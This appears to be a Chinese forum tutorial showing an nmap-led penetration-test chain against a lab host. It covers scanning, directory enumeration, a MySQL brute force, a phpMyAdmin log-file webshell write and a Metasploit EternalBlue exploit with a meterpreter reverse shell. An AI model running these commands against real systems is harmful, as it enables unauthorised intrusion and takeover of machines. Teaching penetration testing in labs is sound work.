Kali 笔记

搜索
查看: 922|回复: 0

nmap在渗透测试中的运用

[复制链接]
回帖奖励 1 威望 回复本帖可获得 1 威望 奖励! 每人限 1 次

559

主题

806

帖子

2080

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2080

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-7-18 12:56:58 | 显示全部楼层 |阅读模式

Nmap 这个神器在渗透测试中是必不可少的。从信息收集到拿 shell。有时候还真少不了它!本文将要介绍 nmap 在渗透测试中,都有那些运用和测试手段。 nmap

一:利用 nmap 对目标进行信息收集

命令如下:

nmap -T4 -A 192.168.123.239

对目标主机扫描结果 从上图我们发现,目标是一台 windows 系统,并且开启了常见的 80 445 3306 等常见的端口。

二:对目标站点进行扫描

命令如下:

dirb http://192.168.123.239

通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include 等等。 在第一步中,我们扫描到了 3306 端口,这也意味着目标可以远程登录数据库。

三:利用 nmap 暴力破解 MySQL

命令如下:

nmap -p 3306 --script=mysql-brute.nse 192.168.123.239

如上,通过暴力破解,我们得到了账号和密码为 root123456

四:尝试远程登录

命令如下:

mysql -h 192.168.123.239 -u root -p

成功登录数据库

利用 phpMyAdmin 拿 shell

在前期的文章中提到过,我们先登录到 phpMyAdin 执行下面的 SQL 语句

SET GLOBAL GENERAL_log='on';
SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';
SELECT '';

需要注意的是,一定要写对目标的站点根目录的绝对地址 执行完成后,会在更目录生成一个 cmd.php 文件,我们访问效果如下: 利用此种方式,便可成功拿 shell。

五:利用 nmap 扫描目标主机漏洞

命令如下:

nmap -v  --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn

扫描结果如下: 可以看到,目标存在 ms17-010 ms10-054 CVE-2017-0143 等漏洞。

六:配合 msfconsole 那些系统权限

命令如下:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti

通过上诉示例,我们利用 nmap 从简单的信息收集到拿 shell。一次完整的渗透测试就完成了。 ::twemoji:smile::

来自群组: kali学习
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表